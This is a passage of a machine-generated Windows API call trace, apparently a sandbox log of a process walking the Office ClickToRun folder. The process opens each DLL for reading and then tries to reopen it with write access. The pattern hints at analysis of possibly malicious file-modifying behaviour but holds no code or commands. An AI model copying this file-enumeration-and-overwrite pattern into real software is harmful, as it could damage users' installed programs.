dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0074.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0074.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x51398 [0074.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0074.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.714] AreFileApisANSI () returned 1 [0074.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0074.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0074.717] AreFileApisANSI () returned 1 [0074.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0074.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.722] GetFileType (hFile=0x430) returned 0x1 [0074.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.723] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.723] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.725] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.726] CloseHandle (hObject=0x430) returned 1 [0074.728] AreFileApisANSI () returned 1 [0074.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0074.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.731] GetFileType (hFile=0x430) returned 0x1 [0074.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.731] CloseHandle (hObject=0x430) returned 1 [0074.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0074.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0074.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0074.744] AreFileApisANSI () returned 1 [0074.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0074.744] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.744] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb979f700, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x27c40, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="ApiClient.dll", cAlternateFileName="APICLI~1.DLL")) returned 1 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0074.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0074.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0074.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0074.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0074.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.745] AreFileApisANSI () returned 1 [0074.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll", lpUsedDefaultChar=0x0) returned 72 [0074.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0074.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.745] AreFileApisANSI () returned 1 [0074.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0074.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0074.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 72 [0074.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.746] GetFileType (hFile=0x430) returned 0x1 [0074.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0074.746] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.746] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.746] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.746] CloseHandle (hObject=0x430) returned 1 [0074.746] AreFileApisANSI () returned 1 [0074.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0074.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0074.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 72 [0074.746] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.747] GetLastError () returned 0x20 [0074.747] GetLastError () returned 0x20 [0074.747] SetLastError (dwErrCode=0x20) [0074.747] GetLastError () returned 0x20 [0074.747] SetLastError (dwErrCode=0x20) [0074.747] GetLastError () returned 0x20 [0074.747] SetLastError (dwErrCode=0x20) [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0074.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.747] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9bc01200, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0xa02d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVCatalog.dll", cAlternateFileName="APPVCA~1.DLL")) returned 1 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0074.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0074.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0074.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0074.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0074.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.748] AreFileApisANSI () returned 1 [0074.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 